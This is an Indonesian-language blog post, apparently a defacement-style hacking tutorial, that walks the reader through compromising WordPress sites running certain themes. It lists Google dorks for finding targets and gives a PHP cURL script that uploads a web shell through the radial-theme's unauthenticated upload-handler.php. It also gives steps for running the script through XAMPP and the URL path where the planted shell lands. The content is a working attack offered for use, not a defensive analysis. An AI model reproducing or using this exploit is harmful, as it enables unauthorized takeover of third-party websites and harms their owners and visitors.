Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)
Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"
3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln
4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D
<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D
5).Aktifkan XAMPP Klik Start Pada Apache
6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php
8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D
10).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php
SUMBER
0 komentar:
Posting Komentar